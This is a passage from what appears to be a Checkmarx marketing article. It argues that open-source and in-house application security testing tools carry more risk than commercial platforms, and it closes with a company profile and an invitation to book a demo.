Checkmarx itself has several open-source application security testing projects that are very active and updated on a daily or weekly basis. Today, a quick review of our most active projects shows dozens of open issues and pull requests that ostensibly fix defects or add capabilities the community needs. This merely reiterates that the responsiveness of open-source projects to issues and challenges (even projects that are highly crowd-sourced and diligently supported) is, in most cases, not sufficient on its own for enterprises.

Conclusion

Ultimately, the decision to approach AppSec testing using either open source and in-house developed tools or commercial AppSec solutions boils down to risk. Organizations and enterprises have a risk budget in much the same way they have an OPEX or CAPEX budget, and the two are inversely proportional. While open source or in-house developed AppSec solutions minimize upfront or short-term costs, they do so at the expense of operations, maintainability, and flexibility, and at the cost of increased risk exposure.

For enterprises, while free and open-source tools can augment an existing AppSec program or solution, on their own they simply cannot meet the organization’s needs in terms of ease of use, maintainability, or service and support.

About Checkmarx

Checkmarx’s comprehensive and integrated Application Security Testing Platform provides a robust, flexible, and extensible AppSec solution that allows organizations to leverage our years of experience, research, and understanding in an easy-to-use platform.

Reach out for a live demo today to see for yourself!
